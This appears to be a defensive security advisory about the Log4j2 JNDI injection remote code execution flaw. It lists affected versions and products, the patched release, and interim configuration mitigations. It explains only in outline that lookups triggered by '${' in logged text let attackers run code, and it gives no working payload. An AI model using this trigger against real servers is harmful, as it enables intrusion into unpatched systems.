In the early morning of December 10, the details of the remote code execution vulnerability of the Apache open source project Log4j2 were disclosed, and the vulnerability threat level was serious.
Log4j2 is a Java-based logging tool. It rewrites the Log4j framework and introduces a large number of rich features, allowing users to control the destination of log information delivery to consoles, files, GUI components, etc. At the same time, by defining the level of each log information, users can control the log generation process in more detail.
Log4j is currently one of the most widely used java logging frameworks in the world. The vulnerability also affects many of the world’s top open source components, such as Apache Struts2, Apache Solr, Apache Druid, Apache Flink, etc. Because the vulnerability is easy to exploit, once an attacker exploits the vulnerability, he can execute arbitrary code on the target server, causing great harm to the victim.
Vulnerability details
This vulnerability is mainly due to the JNDI injection vulnerability in the lookup function contained in Log4j2, which can help developers to read the configuration in the corresponding environment through some protocols. The vulnerability triggering method is very simple. As long as the keyword ${ is included in the log content, the content contained in it can be replaced as a variable. The attacker does not need any permissions and can execute arbitrary commands.
The version affected by this vulnerability is: Apache Log4j 2.x <= 2.14.1
At the same time, if you use the following applications, you will also be affected by this vulnerability:
- Spring-Boot-strater-log4j2
- Apache Struts2
- Apache Solr
- Apache Flink
- Apache Druid
- ElasticSearch
- flume
- dubbo
- logstash
- kafka
Bug fix
At present, the manufacturer has released a new version log4j-2.15.0-rc2, which has fixed vulnerabilities. I hope you can upgrade to the new version as soon as possible.
Official link: https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2
If you are temporarily inconvenient to upgrade the version, you can also use the following methods for emergency treatment, and complete the version upgrade as soon as it is convenient:
- Modify the jvm parameter -Dlog4j2.formatMsgNoLookups=true
- Modify the configuration log4j2.formatMsgNoLookups=True
- Set the system environment variable FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS to true
Whether it was a vulnerability in the rememberMe encryption algorithm of Apach Shiro's cookie persistence parameter the previous year, or the Fastjson remote code execution vulnerability notification in May last year. Network security always seems to have various problems, but discovering and fixing vulnerabilities is itself an upgrade of security. The security method that is not moving will soon be breached, and only continuous updates and upgrades are the real network security.
**粗体** _斜体_ [链接](http://example.com) `代码` - 列表 > 引用
。你还可以使用@
来通知其他用户。